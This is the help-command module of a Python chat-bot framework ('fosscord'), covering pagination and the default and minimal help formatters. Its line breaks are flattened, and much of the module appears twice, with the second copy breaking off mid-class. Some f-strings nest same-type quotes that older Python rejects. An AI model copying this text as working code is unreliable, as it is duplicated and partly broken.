cmd.all_commands.get(key) except AttributeError: string = await maybe_coro(self.subcommand_not_found, cmd, self.remove_mentions(key)) return await self.send_error_message(string) else: if found is None: string = await maybe_coro(self.subcommand_not_found, cmd, self.remove_mentions(key)) return await self.send_error_message(string) cmd = found if isinstance(cmd, Group): return await self.send_group_help(cmd) else: return await self.send_command_help(cmd) class DefaultHelpCommand(HelpCommand): """The implementation of the default help command. This inherits from :class:`HelpCommand`. It extends it with the following attributes. Attributes ------------ width: :class:`int` The maximum number of characters that fit in a line. Defaults to 80. sort_commands: :class:`bool` Whether to sort the commands in the output alphabetically. Defaults to ``True``. dm_help: Optional[:class:`bool`] A tribool that indicates if the help command should DM the user instead of sending it to the channel it received it from. If the boolean is set to ``True``, then all help output is DM'd. If ``False``, none of the help output is DM'd. If ``None``, then the bot will only DM when the help message becomes too long (dictated by more than :attr:`dm_help_threshold` characters). Defaults to ``False``. dm_help_threshold: Optional[:class:`int`] The number of characters the paginator must accumulate before getting DM'd to the user if :attr:`dm_help` is set to ``None``. Defaults to 1000. indent: :class:`int` How much to indent the commands from a heading. Defaults to ``2``. commands_heading: :class:`str` The command list's heading string used when the help command is invoked with a category name. Useful for i18n. Defaults to ``"Commands:"`` no_category: :class:`str` The string used when there is a command which does not belong to any category(cog). Useful for i18n. Defaults to ``"No Category"`` paginator: :class:`Paginator` The paginator used to paginate the help command output. """ def __init__(self, **options): self.width = options.pop('width', 80) self.indent = options.pop('indent', 2) self.sort_commands = options.pop('sort_commands', True) self.dm_help = options.pop('dm_help', False) self.dm_help_threshold = options.pop('dm_help_threshold', 1000) self.commands_heading = options.pop('commands_heading', "Commands:") self.no_category = options.pop('no_category', 'No Category') self.paginator = options.pop('paginator', None) if self.paginator is None: self.paginator = Paginator() super().__init__(**options) def shorten_text(self, text): """:class:`str`: Shortens text to fit into the :attr:`width`.""" if len(text) > self.width: return text[:self.width - 3].rstrip() + '...' return text def get_ending_note(self): """:class:`str`: Returns help command's ending note. This is mainly useful to override for i18n purposes.""" command_name = self.invoked_with return ( f"Type {self.context.clean_prefix}{command_name} command for more info on a command.\n" f"You can also type {self.context.clean_prefix}{command_name} category for more info on a category." ) def add_indented_commands(self, commands, *, heading, max_size=None): """Indents a list of commands after the specified heading. The formatting is added to the :attr:`paginator`. The default implementation is the command name indented by :attr:`indent` spaces, padded to ``max_size`` followed by the command's :attr:`Command.short_doc` and then shortened to fit into the :attr:`width`. Parameters ----------- commands: Sequence[:class:`Command`] A list of commands to indent for output. heading: :class:`str` The heading to add to the output. This is only added if the list of commands is greater than 0. max_size: Optional[:class:`int`] The max size to use for the gap between indents. If unspecified, calls :meth:`~HelpCommand.get_max_size` on the commands parameter. """ if not commands: return self.paginator.add_line(heading) max_size = max_size or self.get_max_size(commands) get_width = fosscord.utils._string_width for command in commands: name = command.name width = max_size - (get_width(name) - len(name)) entry = f'{self.indent * ' '}{name:<{width}} {command.short_doc}' self.paginator.add_line(self.shorten_text(entry)) async def send_pages(self): """A helper utility to send the page output from :attr:`paginator` to the destination.""" destination = self.get_destination() for page in self.paginator.pages: await destination.send(page) def add_command_formatting(self, command): """A utility function to format the non-indented block of commands and groups. Parameters ------------ command: :class:`Command` The command to format. """ if command.description: self.paginator.add_line(command.description, empty=True) signature = self.get_command_signature(command) self.paginator.add_line(signature, empty=True) if command.help: try: self.paginator.add_line(command.help, empty=True) except RuntimeError: for line in command.help.splitlines(): self.paginator.add_line(line) self.paginator.add_line() def get_destination(self): ctx = self.context if self.dm_help is True: return ctx.author elif self.dm_help is None and len(self.paginator) > self.dm_help_threshold: return ctx.author else: return ctx.channel async def prepare_help_command(self, ctx, command): self.paginator.clear() await super().prepare_help_command(ctx, command) async def send_bot_help(self, mapping): ctx = self.context bot = ctx.bot if bot.description: # <description> portion self.paginator.add_line(bot.description, empty=True) no_category = f'\u200b{self.no_category}:' def get_category(command, *, no_category=no_category): cog = command.cog return cog.qualified_name + ':' if cog is not None else no_category filtered = await self.filter_commands(bot.commands, sort=True, key=get_category) max_size = self.get_max_size(filtered) to_iterate = itertools.groupby(filtered, key=get_category) # Now we can add the commands to the page. for category, commands in to_iterate: commands = sorted(commands, key=lambda c: c.name) if self.sort_commands else list(commands) self.add_indented_commands(commands, heading=category, max_size=max_size) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_command_help(self, command): self.add_command_formatting(command) self.paginator.close_page() await self.send_pages() async def send_group_help(self, group): self.add_command_formatting(group) filtered = await self.filter_commands(group.commands, sort=self.sort_commands) self.add_indented_commands(filtered, heading=self.commands_heading) if filtered: note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_cog_help(self, cog): if cog.description: self.paginator.add_line(cog.description, empty=True) filtered = await self.filter_commands(cog.get_commands(), sort=self.sort_commands) self.add_indented_commands(filtered, heading=self.commands_heading) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() class MinimalHelpCommand(HelpCommand): """An implementation of a help command with minimal output. This inherits from :class:`HelpCommand`. Attributes ------------ sort_commands: :class:`bool` Whether to sort the commands in the output alphabetically. Defaults to ``True``. commands_heading: :class:`str` The command list's heading string used when the help command is invoked with a category name. Useful for i18n. Defaults to ``"Commands"`` aliases_heading: :class:`str` The alias list's heading string used to list the aliases of the command. Useful for i18n. Defaults to ``"Aliases:"``. dm_help: Optional[:class:`bool`] A tribool that indicates if the help command should DM the user instead of sending it to the channel it received it from. If the boolean is set to ``True``, then all help output is DM'd. If ``False``, none of the help output is DM'd. If ``None``, then the bot will only DM when the help message becomes too long (dictated by more than :attr:`dm_help_threshold` characters). Defaults to ``False``. dm_help_threshold: Optional[:class:`int`] The number of characters the paginator must accumulate before getting DM'd to the user if :attr:`dm_help` is set to ``None``. Defaults to 1000. no_category: :class:`str` The string used when there is a command which does not belong to any category(cog). Useful for i18n. Defaults to ``"No Category"`` paginator: :class:`Paginator` The paginator used to paginate the help command output. """ def __init__(self, **options): self.sort_commands = options.pop('sort_commands', True) self.commands_heading = options.pop('commands_heading', "Commands") self.dm_help = options.pop('dm_help', False) self.dm_help_threshold = options.pop('dm_help_threshold', 1000) self.aliases_heading = options.pop('aliases_heading', "Aliases:") self.no_category = options.pop('no_category', 'No Category') self.paginator = options.pop('paginator', None) if self.paginator is None: self.paginator = Paginator(suffix=None, prefix=None) super().__init__(**options) async def send_pages(self): """A helper utility to send the page output from :attr:`paginator` to the destination.""" destination = self.get_destination() for page in self.paginator.pages: await destination.send(page) def get_opening_note(self): """Returns help command's opening note. This is mainly useful to override for i18n purposes. The default implementation returns :: Use `{prefix}{command_name} [command]` for more info on a command. You can also use `{prefix}{command_name} [category]` for more info on a category. Returns ------- :class:`str` The help command opening note. """ command_name = self.invoked_with return ( f"Use `{self.context.clean_prefix}{command_name} [command]` for more info on a command.\n" f"You can also use `{self.context.clean_prefix}{command_name} [category]` for more info on a category." ) def get_command_signature(self, command): return f'{self.context.clean_prefix}{command.qualified_name} {command.signature}' def get_ending_note(self): """Return the help command's ending note. This is mainly useful to override for i18n purposes. The default implementation does nothing. Returns ------- :class:`str` The help command ending note. """ return None def add_bot_commands_formatting(self, commands, heading): """Adds the minified bot heading with commands to the output. The formatting should be added to the :attr:`paginator`. The default implementation is a bold underline heading followed by commands separated by an EN SPACE (U+2002) in the next line. Parameters ----------- commands: Sequence[:class:`Command`] A list of commands that belong to the heading. heading: :class:`str` The heading to add to the line. """ if commands: # U+2002 Middle Dot joined = '\u2002'.join(c.name for c in commands) self.paginator.add_line(f'__**{heading}**__') self.paginator.add_line(joined) def add_subcommand_formatting(self, command): """Adds formatting information on a subcommand. The formatting should be added to the :attr:`paginator`. The default implementation is the prefix and the :attr:`Command.qualified_name` optionally followed by an En dash and the command's :attr:`Command.short_doc`. Parameters ----------- command: :class:`Command` The command to show information of. """ fmt = '{0}{1} \N{EN DASH} {2}' if command.short_doc else '{0}{1}' self.paginator.add_line(fmt.format(self.context.clean_prefix, command.qualified_name, command.short_doc)) def add_aliases_formatting(self, aliases): """Adds the formatting information on a command's aliases. The formatting should be added to the :attr:`paginator`. The default implementation is the :attr:`aliases_heading` bolded followed by a comma separated list of aliases. This is not called if there are no aliases to format. Parameters ----------- aliases: Sequence[:class:`str`] A list of aliases to format. """ self.paginator.add_line(f'**{self.aliases_heading}** {', '.join(aliases)}', empty=True) def add_command_formatting(self, command): """A utility function to format commands and groups. Parameters ------------ command: :class:`Command` The command to format. """ if command.description: self.paginator.add_line(command.description, empty=True) signature = self.get_command_signature(command) if command.aliases: self.paginator.add_line(signature) self.add_aliases_formatting(command.aliases) else: self.paginator.add_line(signature, empty=True) if command.help: try: self.paginator.add_line(command.help, empty=True) except RuntimeError: for line in command.help.splitlines(): self.paginator.add_line(line) self.paginator.add_line() def get_destination(self): ctx = self.context if self.dm_help is True: return ctx.author elif self.dm_help is None and len(self.paginator) > self.dm_help_threshold: return ctx.author else: return ctx.channel async def prepare_help_command(self, ctx, command): self.paginator.clear() await super().prepare_help_command(ctx, command) async def send_bot_help(self, mapping): ctx = self.context bot = ctx.bot if bot.description: self.paginator.add_line(bot.description, empty=True) note = self.get_opening_note() if note: self.paginator.add_line(note, empty=True) no_category = f'\u200b{self.no_category}' def get_category(command, *, no_category=no_category): cog = command.cog return cog.qualified_name if cog is not None else no_category filtered = await self.filter_commands(bot.commands, sort=True, key=get_category) to_iterate = itertools.groupby(filtered, key=get_category) for category, commands in to_iterate: commands = sorted(commands, key=lambda c: c.name) if self.sort_commands else list(commands) self.add_bot_commands_formatting(commands, category) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_cog_help(self, cog): bot = self.context.bot if bot.description: self.paginator.add_line(bot.description, empty=True) note = self.get_opening_note() if note: self.paginator.add_line(note, empty=True) if cog.description: self.paginator.add_line(cog.description, empty=True) filtered = await self.filter_commands(cog.get_commands(), sort=self.sort_commands) if filtered: self.paginator.add_line(f'**{cog.qualified_name} {self.commands_heading}**') for command in filtered: self.add_subcommand_formatting(command) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_group_help(self, group): self.add_command_formatting(group) filtered = await self.filter_commands(group.commands, sort=self.sort_commands) if filtered: note = self.get_opening_note() if note: self.paginator.add_line(note, empty=True) self.paginator.add_line(f'**{self.commands_heading}**') for command in filtered: self.add_subcommand_formatting(command) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_command_help(self, command): self.add_command_formatting(command) self.paginator.close_page() await self.send_pages()
""" The MIT License (MIT) Copyright (c) 2015-present Rapptz Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import itertools import copy import functools import inspect import re from typing import Optional, TYPE_CHECKING import fosscord.utils from .core import Group, Command from .errors import CommandError if TYPE_CHECKING: from .context import Context __all__ = ( 'Paginator', 'HelpCommand', 'DefaultHelpCommand', 'MinimalHelpCommand', ) # help -> shows info of bot on top/bottom and lists subcommands # help command -> shows detailed info of command # help command <subcommand chain> -> same as above # <description> # <command signature with aliases> # <long doc> # Cog: # <command> <shortdoc> # <command> <shortdoc> # Other Cog: # <command> <shortdoc> # No Category: # <command> <shortdoc> # Type <prefix>help command for more info on a command. # You can also type <prefix>help category for more info on a category. class Paginator: """A class that aids in paginating code blocks for Fosscord messages. .. container:: operations .. describe:: len(x) Returns the total number of characters in the paginator. Attributes ----------- prefix: :class:`str` The prefix inserted to every page. e.g. three backticks. suffix: :class:`str` The suffix appended at the end of every page. e.g. three backticks. max_size: :class:`int` The maximum amount of codepoints allowed in a page. linesep: :class:`str` The character string inserted between lines. e.g. a newline character. .. versionadded:: 1.7 """ def __init__(self, prefix='```', suffix='```', max_size=2000, linesep='\n'): self.prefix = prefix self.suffix = suffix self.max_size = max_size self.linesep = linesep self.clear() def clear(self): """Clears the paginator to have no pages.""" if self.prefix is not None: self._current_page = [self.prefix] self._count = len(self.prefix) + self._linesep_len # prefix + newline else: self._current_page = [] self._count = 0 self._pages = [] @property def _prefix_len(self): return len(self.prefix) if self.prefix else 0 @property def _suffix_len(self): return len(self.suffix) if self.suffix else 0 @property def _linesep_len(self): return len(self.linesep) def add_line(self, line='', *, empty=False): """Adds a line to the current page. If the line exceeds the :attr:`max_size` then an exception is raised. Parameters ----------- line: :class:`str` The line to add. empty: :class:`bool` Indicates if another empty line should be added. Raises ------ RuntimeError The line was too big for the current :attr:`max_size`. """ max_page_size = self.max_size - self._prefix_len - self._suffix_len - 2 * self._linesep_len if len(line) > max_page_size: raise RuntimeError(f'Line exceeds maximum page size {max_page_size}') if self._count + len(line) + self._linesep_len > self.max_size - self._suffix_len: self.close_page() self._count += len(line) + self._linesep_len self._current_page.append(line) if empty: self._current_page.append('') self._count += self._linesep_len def close_page(self): """Prematurely terminate a page.""" if self.suffix is not None: self._current_page.append(self.suffix) self._pages.append(self.linesep.join(self._current_page)) if self.prefix is not None: self._current_page = [self.prefix] self._count = len(self.prefix) + self._linesep_len # prefix + linesep else: self._current_page = [] self._count = 0 def __len__(self): total = sum(len(p) for p in self._pages) return total + self._count @property def pages(self): """List[:class:`str`]: Returns the rendered list of pages.""" # we have more than just the prefix in our current page if len(self._current_page) > (0 if self.prefix is None else 1): self.close_page() return self._pages def __repr__(self): fmt = '<Paginator prefix: {0.prefix!r} suffix: {0.suffix!r} linesep: {0.linesep!r} max_size: {0.max_size} count: {0._count}>' return fmt.format(self) def _not_overriden(f): f.__help_command_not_overriden__ = True return f class _HelpCommandImpl(Command): def __init__(self, inject, *args, **kwargs): super().__init__(inject.command_callback, *args, **kwargs) self._original = inject self._injected = inject async def prepare(self, ctx): self._injected = injected = self._original.copy() injected.context = ctx self.callback = injected.command_callback on_error = injected.on_help_command_error if not hasattr(on_error, '__help_command_not_overriden__'): if self.cog is not None: self.on_error = self._on_error_cog_implementation else: self.on_error = on_error await super().prepare(ctx) async def _parse_arguments(self, ctx): # Make the parser think we don't have a cog so it doesn't # inject the parameter into `ctx.args`. original_cog = self.cog self.cog = None try: await super()._parse_arguments(ctx) finally: self.cog = original_cog async def _on_error_cog_implementation(self, dummy, ctx, error): await self._injected.on_help_command_error(ctx, error) @property def clean_params(self): result = self.params.copy() try: del result[next(iter(result))] except StopIteration: raise ValueError('Missing context parameter') from None else: return result def _inject_into_cog(self, cog): # Warning: hacky # Make the cog think that get_commands returns this command # as well if we inject it without modifying __cog_commands__ # since that's used for the injection and ejection of cogs. def wrapped_get_commands(*, _original=cog.get_commands): ret = _original() ret.append(self) return ret # Ditto here def wrapped_walk_commands(*, _original=cog.walk_commands): yield from _original() yield self functools.update_wrapper(wrapped_get_commands, cog.get_commands) functools.update_wrapper(wrapped_walk_commands, cog.walk_commands) cog.get_commands = wrapped_get_commands cog.walk_commands = wrapped_walk_commands self.cog = cog def _eject_cog(self): if self.cog is None: return # revert back into their original methods cog = self.cog cog.get_commands = cog.get_commands.__wrapped__ cog.walk_commands = cog.walk_commands.__wrapped__ self.cog = None class HelpCommand: r"""The base implementation for help command formatting. .. note:: Internally instances of this class are deep copied every time the command itself is invoked to prevent a race condition mentioned in :issue:`2123`. This means that relying on the state of this class to be the same between command invocations would not work as expected. Attributes ------------ context: Optional[:class:`Context`] The context that invoked this help formatter. This is generally set after the help command assigned, :func:`command_callback`\, has been called. show_hidden: :class:`bool` Specifies if hidden commands should be shown in the output. Defaults to ``False``. verify_checks: Optional[:class:`bool`] Specifies if commands should have their :attr:`.Command.checks` called and verified. If ``True``, always calls :attr:`.Command.checks`. If ``None``, only calls :attr:`.Command.checks` in a guild setting. If ``False``, never calls :attr:`.Command.checks`. Defaults to ``True``. .. versionchanged:: 1.7 command_attrs: :class:`dict` A dictionary of options to pass in for the construction of the help command. This allows you to change the command behaviour without actually changing the implementation of the command. The attributes will be the same as the ones passed in the :class:`.Command` constructor. """ MENTION_TRANSFORMS = { '@everyone': '@\u200beveryone', '@here': '@\u200bhere', r'<@!?[0-9]{17,22}>': '@deleted-user', r'<@&[0-9]{17,22}>': '@deleted-role', } MENTION_PATTERN = re.compile('|'.join(MENTION_TRANSFORMS.keys())) def __new__(cls, *args, **kwargs): # To prevent race conditions of a single instance while also allowing # for settings to be passed the original arguments passed must be assigned # to allow for easier copies (which will be made when the help command is actually called) # see issue 2123 self = super().__new__(cls) # Shallow copies cannot be used in this case since it is not unusual to pass # instances that need state, e.g. Paginator or what have you into the function # The keys can be safely copied as-is since they're 99.99% certain of being # string keys deepcopy = copy.deepcopy self.__original_kwargs__ = {k: deepcopy(v) for k, v in kwargs.items()} self.__original_args__ = deepcopy(args) return self def __init__(self, **options): self.show_hidden = options.pop('show_hidden', False) self.verify_checks = options.pop('verify_checks', True) self.command_attrs = attrs = options.pop('command_attrs', {}) attrs.setdefault('name', 'help') attrs.setdefault('help', 'Shows this message') self.context: Context = fosscord.utils.MISSING self._command_impl = _HelpCommandImpl(self, **self.command_attrs) def copy(self): obj = self.__class__(*self.__original_args__, **self.__original_kwargs__) obj._command_impl = self._command_impl return obj def _add_to_bot(self, bot): command = _HelpCommandImpl(self, **self.command_attrs) bot.add_command(command) self._command_impl = command def _remove_from_bot(self, bot): bot.remove_command(self._command_impl.name) self._command_impl._eject_cog() def add_check(self, func): """ Adds a check to the help command. .. versionadded:: 1.4 Parameters ---------- func The function that will be used as a check. """ self._command_impl.add_check(func) def remove_check(self, func): """ Removes a check from the help command. This function is idempotent and will not raise an exception if the function is not in the command's checks. .. versionadded:: 1.4 Parameters ---------- func The function to remove from the checks. """ self._command_impl.remove_check(func) def get_bot_mapping(self): """Retrieves the bot mapping passed to :meth:`send_bot_help`.""" bot = self.context.bot mapping = {cog: cog.get_commands() for cog in bot.cogs.values()} mapping[None] = [c for c in bot.commands if c.cog is None] return mapping @property def invoked_with(self): """Similar to :attr:`Context.invoked_with` except properly handles the case where :meth:`Context.send_help` is used. If the help command was used regularly then this returns the :attr:`Context.invoked_with` attribute. Otherwise, if it the help command was called using :meth:`Context.send_help` then it returns the internal command name of the help command. Returns --------- :class:`str` The command name that triggered this invocation. """ command_name = self._command_impl.name ctx = self.context if ctx is None or ctx.command is None or ctx.command.qualified_name != command_name: return command_name return ctx.invoked_with def get_command_signature(self, command): """Retrieves the signature portion of the help page. Parameters ------------ command: :class:`Command` The command to get the signature of. Returns -------- :class:`str` The signature for the command. """ parent = command.parent entries = [] while parent is not None: if not parent.signature or parent.invoke_without_command: entries.append(parent.name) else: entries.append(parent.name + ' ' + parent.signature) parent = parent.parent parent_sig = ' '.join(reversed(entries)) if len(command.aliases) > 0: aliases = '|'.join(command.aliases) fmt = f'[{command.name}|{aliases}]' if parent_sig: fmt = parent_sig + ' ' + fmt alias = fmt else: alias = command.name if not parent_sig else parent_sig + ' ' + command.name return f'{self.context.clean_prefix}{alias} {command.signature}' def remove_mentions(self, string): """Removes mentions from the string to prevent abuse. This includes ``@everyone``, ``@here``, member mentions and role mentions. Returns ------- :class:`str` The string with mentions removed. """ def replace(obj, *, transforms=self.MENTION_TRANSFORMS): return transforms.get(obj.group(0), '@invalid') return self.MENTION_PATTERN.sub(replace, string) @property def cog(self): """A property for retrieving or setting the cog for the help command. When a cog is set for the help command, it is as-if the help command belongs to that cog. All cog special methods will apply to the help command and it will be automatically unset on unload. To unbind the cog from the help command, you can set it to ``None``. Returns -------- Optional[:class:`Cog`] The cog that is currently set for the help command. """ return self._command_impl.cog @cog.setter def cog(self, cog): # Remove whatever cog is currently valid, if any self._command_impl._eject_cog() # If a new cog is set then inject it. if cog is not None: self._command_impl._inject_into_cog(cog) def command_not_found(self, string): """|maybecoro| A method called when a command is not found in the help command. This is useful to override for i18n. Defaults to ``No command called {0} found.`` Parameters ------------ string: :class:`str` The string that contains the invalid command. Note that this has had mentions removed to prevent abuse. Returns --------- :class:`str` The string to use when a command has not been found. """ return f'No command called "{string}" found.' def subcommand_not_found(self, command, string): """|maybecoro| A method called when a command did not have a subcommand requested in the help command. This is useful to override for i18n. Defaults to either: - ``'Command "{command.qualified_name}" has no subcommands.'`` - If there is no subcommand in the ``command`` parameter. - ``'Command "{command.qualified_name}" has no subcommand named {string}'`` - If the ``command`` parameter has subcommands but not one named ``string``. Parameters ------------ command: :class:`Command` The command that did not have the subcommand requested. string: :class:`str` The string that contains the invalid subcommand. Note that this has had mentions removed to prevent abuse. Returns --------- :class:`str` The string to use when the command did not have the subcommand requested. """ if isinstance(command, Group) and len(command.all_commands) > 0: return f'Command "{command.qualified_name}" has no subcommand named {string}' return f'Command "{command.qualified_name}" has no subcommands.' async def filter_commands(self, commands, *, sort=False, key=None): """|coro| Returns a filtered list of commands and optionally sorts them. This takes into account the :attr:`verify_checks` and :attr:`show_hidden` attributes. Parameters ------------ commands: Iterable[:class:`Command`] An iterable of commands that are getting filtered. sort: :class:`bool` Whether to sort the result. key: Optional[Callable[:class:`Command`, Any]] An optional key function to pass to :func:`py:sorted` that takes a :class:`Command` as its sole parameter. If ``sort`` is passed as ``True`` then this will default as the command name. Returns --------- List[:class:`Command`] A list of commands that passed the filter. """ if sort and key is None: key = lambda c: c.name iterator = commands if self.show_hidden else filter(lambda c: not c.hidden, commands) if self.verify_checks is False: # if we do not need to verify the checks then we can just # run it straight through normally without using await. return sorted(iterator, key=key) if sort else list(iterator) if self.verify_checks is None and not self.context.guild: # if verify_checks is None and we're in a DM, don't verify return sorted(iterator, key=key) if sort else list(iterator) # if we're here then we need to check every command if it can run async def predicate(cmd): try: return await cmd.can_run(self.context) except CommandError: return False ret = [] for cmd in iterator: valid = await predicate(cmd) if valid: ret.append(cmd) if sort: ret.sort(key=key) return ret def get_max_size(self, commands): """Returns the largest name length of the specified command list. Parameters ------------ commands: Sequence[:class:`Command`] A sequence of commands to check for the largest size. Returns -------- :class:`int` The maximum width of the commands. """ as_lengths = (fosscord.utils._string_width(c.name) for c in commands) return max(as_lengths, default=0) def get_destination(self): """Returns the :class:`~fosscord.abc.Messageable` where the help command will be output. You can override this method to customise the behaviour. By default this returns the context's channel. Returns ------- :class:`.abc.Messageable` The destination where the help command will be output. """ return self.context.channel async def send_error_message(self, error): """|coro| Handles the implementation when an error happens in the help command. For example, the result of :meth:`command_not_found` will be passed here. You can override this method to customise the behaviour. By default, this sends the error message to the destination specified by :meth:`get_destination`. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. Parameters ------------ error: :class:`str` The error message to display to the user. Note that this has had mentions removed to prevent abuse. """ destination = self.get_destination() await destination.send(error) @_not_overriden async def on_help_command_error(self, ctx, error): """|coro| The help command's error handler, as specified by :ref:`ext_commands_error_handler`. Useful to override if you need some specific behaviour when the error handler is called. By default this method does nothing and just propagates to the default error handlers. Parameters ------------ ctx: :class:`Context` The invocation context. error: :class:`CommandError` The error that was raised. """ pass async def send_bot_help(self, mapping): """|coro| Handles the implementation of the bot command page in the help command. This function is called when the help command is called with no arguments. It should be noted that this method does not return anything -- rather the actual message sending should be done inside this method. Well behaved subclasses should use :meth:`get_destination` to know where to send, as this is a customisation point for other users. You can override this method to customise the behaviour. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. Also, the commands in the mapping are not filtered. To do the filtering you will have to call :meth:`filter_commands` yourself. Parameters ------------ mapping: Mapping[Optional[:class:`Cog`], List[:class:`Command`]] A mapping of cogs to commands that have been requested by the user for help. The key of the mapping is the :class:`~.commands.Cog` that the command belongs to, or ``None`` if there isn't one, and the value is a list of commands that belongs to that cog. """ return None async def send_cog_help(self, cog): """|coro| Handles the implementation of the cog page in the help command. This function is called when the help command is called with a cog as the argument. It should be noted that this method does not return anything -- rather the actual message sending should be done inside this method. Well behaved subclasses should use :meth:`get_destination` to know where to send, as this is a customisation point for other users. You can override this method to customise the behaviour. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. To get the commands that belong to this cog see :meth:`Cog.get_commands`. The commands returned not filtered. To do the filtering you will have to call :meth:`filter_commands` yourself. Parameters ----------- cog: :class:`Cog` The cog that was requested for help. """ return None async def send_group_help(self, group): """|coro| Handles the implementation of the group page in the help command. This function is called when the help command is called with a group as the argument. It should be noted that this method does not return anything -- rather the actual message sending should be done inside this method. Well behaved subclasses should use :meth:`get_destination` to know where to send, as this is a customisation point for other users. You can override this method to customise the behaviour. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. To get the commands that belong to this group without aliases see :attr:`Group.commands`. The commands returned not filtered. To do the filtering you will have to call :meth:`filter_commands` yourself. Parameters ----------- group: :class:`Group` The group that was requested for help. """ return None async def send_command_help(self, command): """|coro| Handles the implementation of the single command page in the help command. It should be noted that this method does not return anything -- rather the actual message sending should be done inside this method. Well behaved subclasses should use :meth:`get_destination` to know where to send, as this is a customisation point for other users. You can override this method to customise the behaviour. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. .. admonition:: Showing Help :class: helpful There are certain attributes and methods that are helpful for a help command to show such as the following: - :attr:`Command.help` - :attr:`Command.brief` - :attr:`Command.short_doc` - :attr:`Command.description` - :meth:`get_command_signature` There are more than just these attributes but feel free to play around with these to help you get started to get the output that you want. Parameters ----------- command: :class:`Command` The command that was requested for help. """ return None async def prepare_help_command(self, ctx, command=None): """|coro| A low level method that can be used to prepare the help command before it does anything. For example, if you need to prepare some state in your subclass before the command does its processing then this would be the place to do it. The default implementation does nothing. .. note:: This is called *inside* the help command callback body. So all the usual rules that happen inside apply here as well. Parameters ----------- ctx: :class:`Context` The invocation context. command: Optional[:class:`str`] The argument passed to the help command. """ pass async def command_callback(self, ctx, *, command=None): """|coro| The actual implementation of the help command. It is not recommended to override this method and instead change the behaviour through the methods that actually get dispatched. - :meth:`send_bot_help` - :meth:`send_cog_help` - :meth:`send_group_help` - :meth:`send_command_help` - :meth:`get_destination` - :meth:`command_not_found` - :meth:`subcommand_not_found` - :meth:`send_error_message` - :meth:`on_help_command_error` - :meth:`prepare_help_command` """ await self.prepare_help_command(ctx, command) bot = ctx.bot if command is None: mapping = self.get_bot_mapping() return await self.send_bot_help(mapping) # Check if it's a cog cog = bot.get_cog(command) if cog is not None: return await self.send_cog_help(cog) maybe_coro = fosscord.utils.maybe_coroutine # If it's not a cog then it's a command. # Since we want to have detailed errors when someone # passes an invalid subcommand, we need to walk through # the command group chain ourselves. keys = command.split(' ') cmd = bot.all_commands.get(keys[0]) if cmd is None: string = await maybe_coro(self.command_not_found, self.remove_mentions(keys[0])) return await self.send_error_message(string) for key in keys[1:]: try: found = cmd.all_commands.get(key) except AttributeError: string = await maybe_coro(self.subcommand_not_found, cmd, self.remove_mentions(key)) return await self.send_error_message(string) else: if found is None: string = await maybe_coro(self.subcommand_not_found, cmd, self.remove_mentions(key)) return await self.send_error_message(string) cmd = found if isinstance(cmd, Group): return await self.send_group_help(cmd) else: return await self.send_command_help(cmd) class DefaultHelpCommand(HelpCommand): """The implementation of the default help command. This inherits from :class:`HelpCommand`. It extends it with the following attributes. Attributes ------------ width: :class:`int` The maximum number of characters that fit in a line. Defaults to 80. sort_commands: :class:`bool` Whether to sort the commands in the output alphabetically. Defaults to ``True``. dm_help: Optional[:class:`bool`] A tribool that indicates if the help command should DM the user instead of sending it to the channel it received it from. If the boolean is set to ``True``, then all help output is DM'd. If ``False``, none of the help output is DM'd. If ``None``, then the bot will only DM when the help message becomes too long (dictated by more than :attr:`dm_help_threshold` characters). Defaults to ``False``. dm_help_threshold: Optional[:class:`int`] The number of characters the paginator must accumulate before getting DM'd to the user if :attr:`dm_help` is set to ``None``. Defaults to 1000. indent: :class:`int` How much to indent the commands from a heading. Defaults to ``2``. commands_heading: :class:`str` The command list's heading string used when the help command is invoked with a category name. Useful for i18n. Defaults to ``"Commands:"`` no_category: :class:`str` The string used when there is a command which does not belong to any category(cog). Useful for i18n. Defaults to ``"No Category"`` paginator: :class:`Paginator` The paginator used to paginate the help command output. """ def __init__(self, **options): self.width = options.pop('width', 80) self.indent = options.pop('indent', 2) self.sort_commands = options.pop('sort_commands', True) self.dm_help = options.pop('dm_help', False) self.dm_help_threshold = options.pop('dm_help_threshold', 1000) self.commands_heading = options.pop('commands_heading', "Commands:") self.no_category = options.pop('no_category', 'No Category') self.paginator = options.pop('paginator', None) if self.paginator is None: self.paginator = Paginator() super().__init__(**options) def shorten_text(self, text): """:class:`str`: Shortens text to fit into the :attr:`width`.""" if len(text) > self.width: return text[:self.width - 3].rstrip() + '...' return text def get_ending_note(self): """:class:`str`: Returns help command's ending note. This is mainly useful to override for i18n purposes.""" command_name = self.invoked_with return ( f"Type {self.context.clean_prefix}{command_name} command for more info on a command.\n" f"You can also type {self.context.clean_prefix}{command_name} category for more info on a category." ) def add_indented_commands(self, commands, *, heading, max_size=None): """Indents a list of commands after the specified heading. The formatting is added to the :attr:`paginator`. The default implementation is the command name indented by :attr:`indent` spaces, padded to ``max_size`` followed by the command's :attr:`Command.short_doc` and then shortened to fit into the :attr:`width`. Parameters ----------- commands: 